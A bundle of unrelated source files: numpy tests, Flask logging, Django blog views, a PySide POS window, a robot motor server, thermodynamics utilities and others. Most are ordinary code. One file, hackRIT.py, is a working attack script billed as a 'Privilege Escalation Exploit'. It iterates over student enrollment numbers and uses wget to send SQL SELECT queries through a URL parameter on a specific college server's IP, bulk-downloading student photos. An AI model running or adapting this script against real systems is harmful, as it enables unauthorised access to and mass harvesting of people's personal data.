np.random.randn(2, 5, 6, 3),
np.random.randn(3, 10, 10, 2),
np.random.randn(1, 23, 17, 5)
]
sizes = [
(1, 1),
2,
(3, 4)
]
steps = [
(1, 2),
(3, 1),
3
]
shapes = [
(2, 5, 3, 1, 1, 3),
(3, 3, 9, 2, 2, 2),
(1, 7, 5, 3, 4, 5)
]
for img, size, step, shape in zip(imgs, sizes, steps, shapes):
self.assertEqual(shape, img2patch(img, size, step).shape)
class TestPatch2Img(unittest.TestCase):
def test_patch2img(self):
img = np.arange(16).reshape(1, 4, 4, 1)
patch = img2patch(img, size=2, step=2)
self.assertTrue((img == patch2img(patch, (2, 2), (1, 4, 4, 1))).all())
patch = img2patch(img, size=3, step=1)
expected = np.arange(0, 32, 2).reshape(1, 4, 4, 1)
expected[0, 0, 0, 0] /= 2
expected[0, 0, -1, 0] /= 2
expected[0, -1, 0, 0] /= 2
expected[0, -1, -1, 0] /= 2
expected[0, 1:3, 1:3, 0] *= 2
self.assertTrue((expected == patch2img(patch, (1, 1), (1, 4, 4, 1))).all())
if __name__ == '__main__':
unittest.main()
|
Kbman99/NetSecShare
|
app/logger_setup.py
|
'''
logger_setup.py customizes the app's logging module. Each time an event is
logged the logger checks the level of the event (eg. debug, warning, info...).
If the event is above the approved threshold then it goes through. The handlers
do the same thing; they output to a file/shell if the event level is above their
threshold.
:Example:
>> from website import logger
>> logger.info('event', foo='bar')
**Levels**:
- logger.debug('For debugging purposes')
- logger.info('An event occured, for example a database update')
- logger.warning('Rare situation')
- logger.error('Something went wrong')
- logger.critical('Very very bad')
You can build a log incrementally as so:
>> log = logger.new(date='now')
>> log = log.bind(weather='rainy')
>> log.info('user logged in', user='John')
'''
import datetime as dt
import logging
from logging.handlers import RotatingFileHandler
import pytz
from flask import request, session
from structlog import wrap_logger
from structlog.processors import JSONRenderer
from app import app
# Set the logging level
app.logger.setLevel(app.config['LOG_LEVEL'])
# Remove the stdout handler
app.logger.removeHandler(app.logger.handlers[0])
TZ = pytz.timezone(app.config['TIMEZONE'])
def add_fields(_, level, event_dict):
''' Add custom fields to each record. '''
now = dt.datetime.now()
#event_dict['timestamp'] = TZ.localize(now, True).astimezone(pytz.utc).isoformat()
event_dict['timestamp'] = TZ.localize(now, True).astimezone\
(pytz.timezone(app.config['TIMEZONE'])).strftime(app.config['TIME_FMT'])
event_dict['level'] = level
if request:
try:
#event_dict['ip_address'] = request.headers['X-Forwarded-For'].split(',')[0].strip()
event_dict['ip_address'] = request.headers.get('X-Forwarded-For', request.remote_addr)
#event_dict['ip_address'] = request.header.get('X-Real-IP')
except:
event_dict['ip_address'] = 'unknown'
return event_dict
# Add a handler to write log messages to a file
if app.config.get('LOG_FILE'):
file_handler = RotatingFileHandler(filename=app.config['LOG_FILENAME'],
maxBytes=app.config['LOG_MAXBYTES'],
backupCount=app.config['LOG_BACKUPS'],
mode='a',
encoding='utf-8')
file_handler.setLevel(logging.DEBUG)
app.logger.addHandler(file_handler)
# Wrap the application logger with structlog to format the output
logger = wrap_logger(
app.logger,
processors=[
add_fields,
JSONRenderer(indent=None)
]
)
|
plotly/plotly.py
|
packages/python/plotly/plotly/validators/scattersmith/_textfont.py
|
import _plotly_utils.basevalidators
class TextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="textfont", parent_name="scattersmith", **kwargs):
super(TextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Textfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for `family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud
for `size`.
""",
),
**kwargs
)
|
our-iot-project-org/pingow-web-service
|
src/posts/views.py
|
from django.core import serializers
from rest_framework.response import Response
from django.http import JsonResponse
try:
from urllib import quote_plus # python 2
except:
pass
try:
from urllib.parse import quote_plus # python 3
except:
pass
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from comments.forms import CommentForm
from comments.models import Comment
from .forms import PostForm
from .models import Post
def post_create(request):
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
form = PostForm(request.POST or None, request.FILES or None)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
# message success
messages.success(request, "Successfully Created")
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"form": form,
}
return render(request, "post_form.html", context)
def post_detail(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
if instance.publish > timezone.now().date() or instance.draft:
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
share_string = quote_plus(instance.content)
initial_data = {
"content_type": instance.get_content_type,
"object_id": instance.id
}
form = CommentForm(request.POST or None, initial=initial_data)
if form.is_valid() and request.user.is_authenticated():
c_type = form.cleaned_data.get("content_type")
content_type = ContentType.objects.get(model=c_type)
obj_id = form.cleaned_data.get('object_id')
content_data = form.cleaned_data.get("content")
parent_obj = None
try:
parent_id = int(request.POST.get("parent_id"))
except:
parent_id = None
if parent_id:
parent_qs = Comment.objects.filter(id=parent_id)
if parent_qs.exists() and parent_qs.count() == 1:
parent_obj = parent_qs.first()
new_comment, created = Comment.objects.get_or_create(
user=request.user,
content_type=content_type,
object_id=obj_id,
content=content_data,
parent=parent_obj,
)
return HttpResponseRedirect(new_comment.content_object.get_absolute_url())
comments = instance.comments
context = {
"title": instance.title,
"instance": instance,
"share_string": share_string,
"comments": comments,
"comment_form": form,
}
return render(request, "post_detail.html", context)
def post_list(request):
today = timezone.now().date()
queryset_list = Post.objects.active() # .order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
queryset_list = Post.objects.all()
query = request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(title__icontains=query) |
Q(content__icontains=query) |
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(queryset_list, 8) # Show 25 contacts per page
page_request_var = "page"
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
queryset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
queryset = paginator.page(paginator.num_pages)
context = {
"object_list": queryset,
"title": "List",
"page_request_var": page_request_var,
"today": today,
}
return render(request, "post_list.html", context)
def post_update(request, slug=None):
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
instance = get_object_or_404(Post, slug=slug)
form = PostForm(request.POST or None,
request.FILES or None, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.save()
messages.success(request, "<a href='#'>Item</a> Saved",
extra_tags='html_safe')
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": instance.title,
"instance": instance,
"form": form,
}
return render(request, "post_form.html", context)
def post_delete(request, slug=None):
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
instance = get_object_or_404(Post, slug=slug)
instance.delete()
messages.success(request, "Successfully deleted")
return redirect("posts:list")
|
joshuamsmith/ConnectPyse
|
sales/order.py
|
from ..cw_model import CWModel
class Order(CWModel):
def __init__(self, json_dict=None):
self.id = None # (Integer)
self.company = None # *(CompanyReference)
self.contact = None # (ContactReference)
self.phone = None # (String)
self.phoneExt = None # (String)
self.email = None # (String)
self.site = None # (SiteReference)
self.status = None # *(OrderStatusReference)
self.opportunity = None # (OpportunityReference)
self.orderDate = None # (String)
self.dueDate = None # (String)
self.billingTerms = None # (BillingTermsReference)
self.taxCode = None # (TaxCodeReference)
self.poNumber = None # (String(50))
self.locationId = None # (Integer)
self.businessUnitId = None # (Integer)
self.salesRep = None # *(MemberReference)
self.notes = None # (String)
self.billClosedFlag = None # (Boolean)
self.billShippedFlag = None # (Boolean)
self.restrictDownpaymentFlag = None # (Boolean)
self.description = None # (String)
self.topCommentFlag = None # (Boolean)
self.bottomCommentFlag = None # (Boolean)
self.shipToCompany = None # (CompanyReference)
self.shipToContact = None # (ContactReference)
self.shipToSite = None # (SiteReference)
self.billToCompany = None # (CompanyReference)
self.billToContact = None # (ContactReference)
self.billToSite = None # (SiteReference)
self.productIds = None # (Integer[])
self.documentIds = None # (Integer[])
self.invoiceIds = None # (Integer[])
self.configIds = None # (Integer[])
self.total = None # (Number)
self.taxTotal = None # (Number)
self._info = None # (Metadata)
# initialize object with json dict
super().__init__(json_dict)
|
coinbox/coinbox-mod-base
|
cbmod/base/views/window.py
|
from pydispatch import dispatcher
from PySide import QtCore, QtGui
import cbpos
logger = cbpos.get_logger(__name__)
from .page import BasePage
class MainWindow(QtGui.QMainWindow):
__inits = []
def __init__(self):
super(MainWindow, self).__init__()
self.tabs = QtGui.QTabWidget(self)
self.tabs.setTabsClosable(False)
self.tabs.setIconSize(QtCore.QSize(32, 32))
self.tabs.currentChanged.connect(self.onCurrentTabChanged)
self.toolbar = self.addToolBar('Base')
self.toolbar.setIconSize(QtCore.QSize(48,48)) #Suitable for touchscreens
self.toolbar.setObjectName('BaseToolbar')
toolbarStyle = cbpos.config['menu', 'toolbar_style']
# The index in this list is the same as that in the configuration page
available_styles = (
QtCore.Qt.ToolButtonFollowStyle,
QtCore.Qt.ToolButtonIconOnly,
QtCore.Qt.ToolButtonTextOnly,
QtCore.Qt.ToolButtonTextBesideIcon,
QtCore.Qt.ToolButtonTextUnderIcon,
)
try:
toolbarStyle = available_styles[int(toolbarStyle)]
except (ValueError, TypeError, IndexError):
toolbarStyle = QtCore.Qt.ToolButtonFollowStyle
self.toolbar.setToolButtonStyle(toolbarStyle)
self.setCentralWidget(self.tabs)
self.statusBar().showMessage(cbpos.tr._('Coinbox POS is ready.'))
self.setWindowTitle('Coinbox')
self.callInit()
self.loadToolbar()
self.loadMenu()
def loadToolbar(self):
"""
Loads the toolbar actions, restore toolbar state, and restore window geometry.
"""
mwState = cbpos.config['mainwindow', 'state']
mwGeom = cbpos.config['mainwindow', 'geometry']
for act in cbpos.menu.actions:
# TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
action = QtGui.QAction(QtGui.QIcon(act.icon), act.label, self)
action.setShortcut(act.shortcut)
action.triggered.connect(act.trigger)
self.toolbar.addAction(action)
#Restores the saved mainwindow's toolbars and docks, and then the window geometry.
if mwState is not None:
self.restoreState( QtCore.QByteArray.fromBase64(mwState) )
if mwGeom is not None:
self.restoreGeometry( QtCore.QByteArray.fromBase64(mwGeom) )
else:
self.setGeometry(0, 0, 800, 600)
def loadMenu(self):
"""
Load the menu root items and items into the QTabWidget with the appropriate pages.
"""
show_empty_root_items = cbpos.config['menu', 'show_empty_root_items']
show_disabled_items = cbpos.config['menu', 'show_disabled_items']
hide_tab_bar = not cbpos.config['menu', 'show_tab_bar']
if hide_tab_bar:
# Hide the tab bar and prepare the toolbar for extra QAction's
self.tabs.tabBar().hide()
# This pre-supposes that the menu items will come after the actions
self.toolbar.addSeparator()
for root in cbpos.menu.items:
if not root.enabled and not show_disabled_items:
continue
if show_disabled_items:
# Show all child items
children = root.children
else:
# Filter out those which are disabled
children = [i for i in root.children if i.enabled]
# Hide empty menu root items
if len(children) == 0 and not show_empty_root_items:
continue
# Add the tab
widget = self.getTabWidget(children)
icon = QtGui.QIcon(root.icon)
index = self.tabs.addTab(widget, icon, root.label)
widget.setEnabled(root.enabled)
# Add the toolbar action if enabled
if hide_tab_bar:
# TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
action = QtGui.QAction(QtGui.QIcon(icon), root.label, self)
action.onTrigger = lambda n=index: self.tabs.setCurrentIndex(n)
action.triggered.connect(action.onTrigger)
self.toolbar.addAction(action)
def onCurrentTabChanged(self, index, tabs=None):
if tabs is None:
tabs = self.tabs
widget = tabs.widget(index)
try:
signal = widget.shown
except AttributeError:
pass
else:
signal.emit()
def getTabWidget(self, items):
"""
Returns the appropriate window to be placed in the main QTabWidget,
depending on the number of children of a root menu item.
"""
count = len(items)
if count == 0:
# If there are no child items, just return an empty widget
widget = QtGui.QWidget()
widget.setEnabled(False)
return widget
elif count == 1:
# If there is only one item, show it as is.
logger.debug('Loading menu page for %s', items[0].name)
widget = items[0].page()
widget.setEnabled(items[0].enabled)
return widget
else:
# If there are many children, add them in a QTabWidget
tabs = QtGui.QTabWidget()
tabs.currentChanged.connect(lambda i, t=tabs: self.onCurrentTabChanged(i, t))
for item in items:
logger.debug('Loading menu page for %s', item.name)
widget = item.page()
icon = QtGui.QIcon(item.icon)
tabs.addTab(widget, icon, item.label)
widget.setEnabled(item.enabled)
return tabs
def saveWindowState(self):
"""
Saves the main window state (position, size, toolbar positions)
"""
mwState = self.saveState().toBase64()
mwGeom = self.saveGeometry().toBase64()
cbpos.config['mainwindow', 'state'] = unicode(mwState)
cbpos.config['mainwindow', 'geometry'] = unicode(mwGeom)
cbpos.config.save()
def closeEvent(self, event):
"""
Perform necessary operations before closing the window.
"""
self.saveWindowState()
#do any other thing before closing...
event.accept()
@classmethod
def addInit(cls, init):
"""
Adds the `init` method to the list of extensions of the `MainWindow.__init__`.
"""
cls.__inits.append(init)
def callInit(self):
"""
Handle calls to `__init__` methods of extensions of the MainWindow.
"""
for init in self.__inits:
init(self)
|
DailyActie/Surrogate-Model
|
01-codes/scipy-master/scipy/odr/setup.py
|
#!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join
def configuration(parent_package='', top_path=None):
import warnings
from numpy.distutils.misc_util import Configuration
from numpy.distutils.system_info import get_info, BlasNotFoundError
config = Configuration('odr', parent_package, top_path)
libodr_files = ['d_odr.f',
'd_mprec.f',
'dlunoc.f']
blas_info = get_info('blas_opt')
if blas_info:
libodr_files.append('d_lpk.f')
else:
warnings.warn(BlasNotFoundError.__doc__)
libodr_files.append('d_lpkbls.f')
odrpack_src = [join('odrpack', x) for x in libodr_files]
config.add_library('odrpack', sources=odrpack_src)
sources = ['__odrpack.c']
libraries = ['odrpack'] + blas_info.pop('libraries', [])
include_dirs = ['.'] + blas_info.pop('include_dirs', [])
config.add_extension('__odrpack',
sources=sources,
libraries=libraries,
include_dirs=include_dirs,
depends=(['odrpack.h'] + odrpack_src),
**blas_info
)
config.add_data_dir('tests')
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
HelsinkiHacklab/urpobotti
|
python/motorctrl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zmq
from zmq.eventloop import ioloop as ioloop_mod
import zmqdecorators
import time
SERVICE_NAME = "urpobot.motor"
SERVICE_PORT = 7575
SIGNALS_PORT = 7576
# How long to wait for new commands before stopping automatically
COMMAND_GRACE_TIME = 0.250
class motorserver(zmqdecorators.service):
def __init__(self, service_name, service_port, serialport):
super(motorserver, self).__init__(service_name, service_port)
self.serial_port = serialport
self.input_buffer = ""
self.evthandler = ioloop_mod.IOLoop.instance().add_handler(self.serial_port.fileno(), self.handle_serial_event, ioloop_mod.IOLoop.instance().READ)
self.last_command_time = time.time()
self.pcb = ioloop_mod.PeriodicCallback(self.check_data_reveived, COMMAND_GRACE_TIME)
self.pcb.start()
def check_data_reveived(self, *args):
if (time.time() - self.last_command_time > COMMAND_GRACE_TIME):
self._setspeeds(0,0)
def _setspeeds(self, m1speed, m2speed):
self.serial_port.write("S%04X%04X\n" % ((m1speed & 0xffff), (m2speed & 0xffff)))
@zmqdecorators.method()
def setspeeds(self, resp, m1speed, m2speed):
self.last_command_time = time.time()
#print("Got speeds %s,%s" % (m1speed, m2speed))
self._setspeeds(m1speed, m2speed)
# TODO: actually handle ACK/NACK somehow (we need to read it from the serialport but we can't block while waiting for it...)
resp.send("ACK")
def handle_serial_event(self, fd, events):
# Copied from arbus that was thread based
if not self.serial_port.inWaiting():
# Don't try to read if there is no data, instead sleep (yield) a bit
time.sleep(0)
return
data = self.serial_port.read(1)
if len(data) == 0:
return
#print("DEBUG: data=%s" % data)
# Put the data into inpit buffer and check for CRLF
self.input_buffer += data
# Trim prefix NULLs and linebreaks
self.input_buffer = self.input_buffer.lstrip(chr(0x0) + "\r\n")
#print "input_buffer=%s" % repr(self.input_buffer)
if ( len(self.input_buffer) > 1
and self.input_buffer[-2:] == "\r\n"):
# Got a message, parse it (sans the CRLF) and empty the buffer
self.message_received(self.input_buffer[:-2])
self.input_buffer = ""
def message_received(self, message):
#print("DEBUG: msg=%s" % message)
try:
# Currently we have no incoming messages from this board
pass
except Exception as e:
print "message_received exception: Got exception %s" % repr(e)
# Ignore indexerrors, they just mean we could not parse the command
pass
pass
def cleanup(self):
print("Cleanup called")
self._setspeeds(0,0)
def run(self):
print("Starting motorserver")
super(motorserver, self).run()
if __name__ == "__main__":
import serial
import sys,os
port = serial.Serial(sys.argv[1], 115200, xonxoff=False, timeout=0.01)
instance = motorserver(SERVICE_NAME, SERVICE_PORT, port)
instance.run()
|
JamesJeffryes/MINE-Database
|
minedatabase/thermodynamics.py
|
"""Basic thermodynamic calculations for pickaxe."""
from typing import Union
import pint
from equilibrator_api import (
Q_,
ComponentContribution,
Reaction,
default_physiological_ionic_strength,
default_physiological_p_h,
default_physiological_p_mg,
default_physiological_temperature,
)
from equilibrator_api.phased_reaction import PhasedReaction
from equilibrator_assets.compounds import Compound
from equilibrator_assets.local_compound_cache import LocalCompoundCache
from equilibrator_cache.compound_cache import CompoundCache
from pymongo import MongoClient
from sqlalchemy import create_engine
from minedatabase.pickaxe import Pickaxe
class Thermodynamics:
"""Class to calculate thermodynamics of Pickaxe runs.
Thermodynamics allows for the calculation of:
1) Standard ∆G' of formation
2) Standard ∆G'o of reaction
3) Physiological ∆G'm of reaction
4) Adjusted ∆G' of reaction
eQuilibrator objects can also be obtained from r_ids and c_ids.
Parameters
----------
mongo_uri: str
URI of the mongo database.
client: MongoClient
Connection to Mongo.
CC: ComponentContribution
eQuilibrator Component Contribution object to calculate ∆G with.
lc: LocalCompoundCache
The local compound cache to generate eQuilibrator compounds from.
"""
def __init__(
self,
):
# Mongo params
self.mongo_uri = None
self.client = None
self._core = None
# eQ params
self.CC = ComponentContribution()
self.lc = None
self._water = None
def load_mongo(self, mongo_uri: Union[str, None] = None):
if mongo_uri:
self.mongo_uri = mongo_uri
self.client = MongoClient(mongo_uri)
else:
self.mongo_uri = "localhost:27017"
self.client = MongoClient()
self._core = self.client["core"]
def _all_dbs_loaded(self):
if self.client and self._core and self.lc:
return True
else:
print("Load connection to Mongo and eQuilibrator local cache.")
return False
def _eq_loaded(self):
if self.lc:
return True
else:
print("Load eQulibrator local cache.")
return False
def _reset_CC(self):
"""reset CC back to defaults"""
self.CC.p_h = default_physiological_p_h
self.CC.p_mg = default_physiological_p_mg
self.CC.temperature = default_physiological_temperature
self.CC.ionic_strength = default_physiological_ionic_strength
def load_thermo_from_postgres(
self, postgres_uri: str = "postgresql:///eq_compounds"
) -> None:
"""Load a LocalCompoundCache from a postgres uri for equilibrator.
Parameters
----------
postgres_uri : str, optional
uri of the postgres DB to use, by default "postgresql:///eq_compounds"
"""
self.lc = LocalCompoundCache()
self.lc.ccache = CompoundCache(create_engine(postgres_uri))
self._water = self.lc.get_compounds("O")
def load_thermo_from_sqlite(
self, sqlite_filename: str = "compounds.sqlite"
) -> None:
"""Load a LocalCompoundCache from a sqlite file for equilibrator.
compounds.sqlite can be generated through LocalCompoundCache's method
generate_local_cache_from_default_zenodo
Parameters
----------
sqlite_filename: str
filename of the sqlite file to load.
"""
self.lc = LocalCompoundCache()
self.lc.load_cache(sqlite_filename)
self._water = self.lc.get_compounds("O")
def get_eQ_compound_from_cid(
self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[Compound, None]:
"""Get an equilibrator compound for a given c_id from the core.
Attempts to retrieve a compound from the core or a specified db_name.
Parameters
----------
c_id : str
compound ID for MongoDB lookup of a compound.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
Database to look for compound in before core database, by default None.
Returns
-------
equilibrator_assets.compounds.Compound
eQuilibrator Compound
"""
# Find locally in pickaxe
compound_smiles = None
if pickaxe:
if c_id in pickaxe.compounds:
compound_smiles = pickaxe.compounds[c_id]["SMILES"]
else:
return None
# Find in mongo db
elif self._all_dbs_loaded():
if db_name:
compound = self.client[db_name].compounds.find_one(
{"_id": c_id}, {"SMILES": 1}
)
if compound:
compound_smiles = compound["SMILES"]
# No cpd smiles from database name
if not compound_smiles:
compound = self._core.compounds.find_one({"_id": c_id}, {"SMILES": 1})
if compound:
compound_smiles = compound["SMILES"]
# No compound_smiles at all
if not compound_smiles or "*" in compound_smiles:
return None
else:
eQ_compound = self.lc.get_compounds(
compound_smiles, bypass_chemaxon=True, save_empty_compounds=True
)
return eQ_compound
def standard_dg_formation_from_cid(
self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[float, None]:
"""Get standard ∆Gfo for a compound.
Parameters
----------
c_id : str
Compound ID to get the ∆Gf for.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
Database to look for compound in before core database, by default None.
Returns
-------
Union[float, None]
∆Gf'o for a compound, or None if unavailable.
"""
eQ_cpd = self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
if not eQ_cpd:
return None
dgf = self.CC.standard_dg_formation(eQ_cpd)
dgf = dgf[0]
return dgf
def get_eQ_reaction_from_rid(
self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[PhasedReaction, None]:
"""Get an eQuilibrator reaction object from an r_id.
Parameters
----------
r_id : str
Reaction id to get object for.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
Database to look for reaction in.
Returns
-------
PhasedReaction
eQuilibrator reactiono to calculate ∆Gr with.
"""
if pickaxe:
if r_id in pickaxe.reactions:
reaction_info = pickaxe.reactions[r_id]
else:
return None
elif db_name:
mine = self.client[db_name]
reaction_info = mine.reactions.find_one({"_id": r_id})
if not reaction_info:
return None
else:
return None
reactants = reaction_info["Reactants"]
products = reaction_info["Products"]
lhs = " + ".join(f"{r[0]} {r[1]}" for r in reactants)
rhs = " + ".join(f"{p[0]} {p[1]}" for p in products)
reaction_string = " => ".join([lhs, rhs])
compounds = set([r[1] for r in reactants])
compounds.update(tuple(p[1] for p in products))
eQ_compound_dict = {
c_id: self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
for c_id in compounds
}
if not all(eQ_compound_dict.values()):
return None
if "X73bc8ef21db580aefe4dbc0af17d4013961d9d17" not in compounds:
eQ_compound_dict["water"] = self._water
eq_reaction = Reaction.parse_formula(eQ_compound_dict.get, reaction_string)
return eq_reaction
def physiological_dg_prime_from_rid(
self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[pint.Measurement, None]:
"""Calculate the ∆Gm' of a reaction.
Parameters
----------
r_id : str
ID of the reaction to calculate.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
MINE the reaction is found in.
Returns
-------
pint.Measurement
The calculated ∆G'm.
"""
eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
if not eQ_reaction:
return None
dGm_prime = self.CC.physiological_dg_prime(eQ_reaction)
return dGm_prime
def standard_dg_prime_from_rid(
self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[pint.Measurement, None]:
"""Calculate the ∆G'o of a reaction.
Parameters
----------
r_id : str
ID of the reaction to calculate.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
MINE the reaction is found in.
Returns
-------
pint.Measurement
The calculated ∆G'o.
"""
eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
if not eQ_reaction:
return None
dG0_prime = self.CC.standard_dg_prime(eQ_reaction)
return dG0_prime
def dg_prime_from_rid(
self,
r_id: str,
pickaxe: Pickaxe = None,
db_name: str = None,
p_h: Q_ = default_physiological_p_h,
p_mg: Q_ = default_physiological_p_mg,
ionic_strength: Q_ = default_physiological_ionic_strength,
) -> Union[pint.Measurement, None]:
"""Calculate the ∆G' of a reaction.
Parameters
----------
r_id : str
ID of the reaction to calculate.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
MINE the reaction is found in.
p_h : Q_
pH of system.
p_mg: Q_
pMg of the system.
ionic_strength: Q_
ionic strength of the system.
Returns
-------
pint.Measurement
The calculated ∆G'.
"""
eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
if not eQ_reaction:
return None
self.CC.p_h = p_h
self.CC.p_mg = p_mg
self.CC.ionic_strength = ionic_strength
dG_prime = self.CC.dg_prime(eQ_reaction)
self._reset_CC()
return dG_prime
|
Yadnyawalkya/hackRIT
|
hackRIT.py
|
import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale (yadnyawalkyatale@gmail.com) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
|
thedemz/python-gems
|
bitten.py
|
import codecs
unicode_string = "Hello Python 3 String"
bytes_object = b"Hello Python 3 Bytes"
print(unicode_string, type(unicode_string))
print(bytes_object, type(bytes_object))
#decode to unicode_string
ux = str(object=bytes_object, encoding="utf-8", errors="strict")
print(ux, type(ux))
ux = bytes_object.decode(encoding="utf-8", errors="strict")
print(ux, type(ux))
hex_bytes = codecs.encode(b"Binary Object", "hex_codec")
def string_to_bytes( text ):
return bin(int.from_bytes(text.encode(), 'big'))
def bytes_to_string( btext ):
#btext = int('0b110100001100101011011000110110001101111', 2)
return btext.to_bytes((btext.bit_length() + 7) // 8, 'big').decode()
def char_to_bytes(char):
return bin(ord(char))
def encodes(text):
bext = text.encode(encoding="utf-8")
enc_bext = codecs.encode(bext, "hex_codec")
return enc_bext.decode("utf-8")
def decodes():
pass
if __name__ == "__main__":
print( encodes("walla") )
|
scikit-learn-contrib/imbalanced-learn
|
imblearn/over_sampling/_random_over_sampler.py
|
"""Class to perform random over-sampling."""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# Christos Aridas
# License: MIT
from collections.abc import Mapping
from numbers import Real
import numpy as np
from scipy import sparse
from sklearn.utils import check_array, check_random_state
from sklearn.utils import _safe_indexing
from sklearn.utils.sparsefuncs import mean_variance_axis
from .base import BaseOverSampler
from ..utils import check_target_type
from ..utils import Substitution
from ..utils._docstring import _random_state_docstring
from ..utils._validation import _deprecate_positional_args
@Substitution(
sampling_strategy=BaseOverSampler._sampling_strategy_docstring,
random_state=_random_state_docstring,
)
class RandomOverSampler(BaseOverSampler):
"""Class to perform random over-sampling.
Object to over-sample the minority class(es) by picking samples at random
